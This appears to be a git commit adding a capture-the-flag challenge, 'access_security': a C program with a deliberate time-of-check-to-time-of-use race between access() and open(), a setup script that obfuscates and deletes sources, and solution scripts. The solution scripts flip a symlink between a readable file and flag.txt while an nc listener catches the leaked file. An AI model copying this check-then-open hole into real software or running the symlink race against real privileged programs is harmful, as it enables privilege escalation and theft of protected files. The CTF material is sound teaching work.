access_security done

README.md

@@ -13,8 +13,8 @@ challenges done:
 * web_server
 * snake_oil 
 * snake_oil_2
+* access_security
 
 TODO:
 * web_server_2
-* access_security
 * modern_rop

chals/access_security/Makefile

+all:
+	gcc -w main.c -o access_security
+	strip access_security

chals/access_security/main.c

+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+//--JUNK CODE--
+
+//--JUNK CODE--
+int main(int argc, char **argv)
+{
+  char *file;
+  char *host;
+
+  file = argv[1];
+  host = argv[2];
+
+  if(access(argv[1], R_OK) == 0) {
+      int fd;
+      int ffd;
+      int rc;
+      struct sockaddr_in sin;
+      char buffer[4096];
+
+      printf("Connection à %s... ", host); fflush(stdout);
+
+      fd = socket(AF_INET, SOCK_STREAM, 0);
+
+      memset(&sin, 0, sizeof(struct sockaddr_in));
+      sin.sin_family = AF_INET;
+//--JUNK CODE--
+
+//--JUNK CODE--
+      sin.sin_addr.s_addr = inet_addr(host);
+      sin.sin_port = htons(1337);
+
+      if(connect(fd, (void *)&sin, sizeof(struct sockaddr_in)) == -1) {
+          printf("Impossible de se connecter\n");
+          exit(EXIT_FAILURE);
+      }
+
+#define HITHERE "SCP PROTOCOL REIMPLEMENTATION\n---TOP SECRET---\n"
+//--JUNK CODE--
+
+//--JUNK CODE--
+      if(write(fd, HITHERE, strlen(HITHERE)) == -1) {
+          exit(EXIT_FAILURE);
+      }
+#undef HITHERE
+
+      printf("Connecté!\nOn envois le fichier...\n"); fflush(stdout);
+
+      ffd = open(file, O_RDONLY);
+      if(ffd == -1) {
+          exit(EXIT_FAILURE);
+      }
+//--JUNK CODE--
+
+//--JUNK CODE--
+      rc = read(ffd, buffer, sizeof(buffer));
+      if(rc == -1) {
+          exit(EXIT_FAILURE);
+      }
+
+      write(fd, buffer, rc);
+
+  } else {
+      printf("PIRATAGE DETECTE\n");
+  }
+}
+

chals/access_security/setup.py

+import subprocess
+import os
+import sys
+import shutil
+from colorama import Fore, Back, Style
+                    # chals_out/chal_name/team_name so 3
+sys.path.insert(1, os.path.join(sys.path[0], '../../..'))
+from libchals import *
+
+FNULL = open(os.devnull, 'w')
+
+# junk code generation
+write_junk_calls("main.c", 64, 3)
+write_junk_calls("main.c", 50, 3)
+write_junk_body("main.c", 14)
+
+subprocess.call("make", stdout=FNULL, stderr=FNULL)
+
+
+# testing this binary is a pain because race condition and is unlikely to fail
+# anyways, so we don't
+
+os.remove("main.c")
+os.remove("Makefile")
+os.remove("setup.py")
+shutil.rmtree("solution")

chals/access_security/solution/access_race.sh

+#!/bin/sh
+touch has_perms
+touch /tmp/hackfile
+while true; do
+    ln -sf has_perms /tmp/race
+    ln -sf flag.txt /tmp/race
+done

chals/access_security/solution/listen_loop.sh

+while true; nc -lvp 1337; done

chals/access_security/solution/program_loop.sh

+#!/bin/sh
+while true; do
+    ./access_security /tmp/race 127.0.0.1
+done